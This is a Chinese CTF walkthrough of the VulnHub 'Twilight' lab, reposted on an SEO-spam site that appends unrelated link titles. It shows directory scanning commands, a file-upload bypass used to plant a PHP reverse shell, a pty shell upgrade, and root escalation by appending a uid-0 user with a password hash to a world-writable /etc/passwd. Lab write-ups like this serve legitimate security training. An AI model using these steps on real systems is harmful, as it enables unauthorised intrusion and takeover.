当前位置: 首页 > news >正文

网上做衣服的网站网站推广优化c重庆

网上做衣服的网站,网站推广优化c重庆,网站建设专家 金石下拉,鸟人高端网站建设TWILIGHT靶场详解 下载地址:https://download.vulnhub.com/sunset/twilight.7z 这是一个比较简单的靶场,拿到IP后我们扫描发现开启了超级多的端口 其实这些端口一点用都没有,在我的方法中 但是也有不同的方法可以拿权限,就需要…

TWILIGHT靶场详解

下载地址:https://download.vulnhub.com/sunset/twilight.7z

这是一个比较简单的靶场,拿到IP后我们扫描发现开启了超级多的端口

其实这些端口一点用都没有,在我的方法中

但是也有不同的方法可以拿权限,就需要这些开放的服务了

image-20230731185350272

扫描目录时候我们发现有一个文件上传的目录,只能上传图片。

dirsearch -u http://192.168.102.199/gallery/

image-20230731185404809

但是我们抓包的时候可以上传PHP文件,然后修改成图片类型。

image-20230731185637352

这样就能上传一个反弹shell

image-20230731185613220

然后我有扫描了一下上传后文件所在的目录,这里用了一个大字典扫描,小字典扫描不到。

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -u http://192.168.102.199/gallery/    

image-20230731190908704

点击我们上传的php文件,下面那个也是我上传的。

image-20230731190934157

这样我们kali就拿到了一个webshell

image-20230731190946469

利用python3美化一下命令行,同时也提高了权限。

python3 -c "import pty;pty.spawn('/bin/bash')"

查看passwd文件的时候发现这个文件是所有人可读可写的。

我们就可以利用这个漏洞,插入一个新用户。

image-20230731191337612

利用下面命令我们就可以插入一个新的有root权限的用户,密码需要加密,我们用openssl工具可以加密对应的账号密码。

echo 'tang:$1$tang$pBxlp5xZvZzeAXxc4Ki/v0:0:0:root:/root:/bin/bash' >> /etc/passwd

image-20230731191604691

su tang登陆新用户发现就是root权限了。

image-20230731191701773

http://www.tj-hxxt.cn/news/66051.html

相关文章:

  • 北京app制作多少钱苏州网站建设优化
  • 科技进步是国防强大的重要的保证seo的推广技巧
  • 杭州建网站的公司宁波正规优化seo公司
  • 什么是自建站微信营销神器
  • 网站宣传搭建百度推广优化是什么?
  • 做网站系统的过程安徽网络关键词优化
  • 一个人开发app能赚钱吗搜索优化整站优化
  • 运城 网站制作口碑营销的步骤
  • 建设部网站如何下载规范 标准上海好的seo公司
  • 甘肃省建设银行网站手机网页链接制作
  • 淄博桓台网站建设方案google框架一键安装
  • 齐博企业网站朝阳seo搜索引擎
  • 公司网站推广方案济南计算机培训机构哪个最好
  • 少女前线b站服免费网络推广平台有哪些
  • b2c 外贸网站建设百度权重3的网站值多少
  • 网站建设及运营 多少钱今日油价92汽油价格调整最新消息
  • 胶州做网站公司营业推广促销
  • 在线做数据图的网站有哪些问题百度网盘资源搜索引擎入口
  • 一级域名网站如何申请免费个人自助建站
  • h5模板下载有哪些网站国外新闻最新消息
  • 网站建设的原则 流程专业网站优化排名
  • 极路由 做网站seo标题优化的心得总结
  • 网站链接怎么做参考文献网络推广费用
  • 印章在线制作网站徐州seo排名收费
  • 全球咨询公司最新排名网站排名优化培训课程
  • 模板网站建设的弊端宁波seo教学
  • 做网站实例互联网营销师证书骗局
  • 做批发的网站有哪些注册安全工程师
  • 佛山做外贸网站特色站长工具seo综合查询可以访问
  • 新安人才网系统优化软件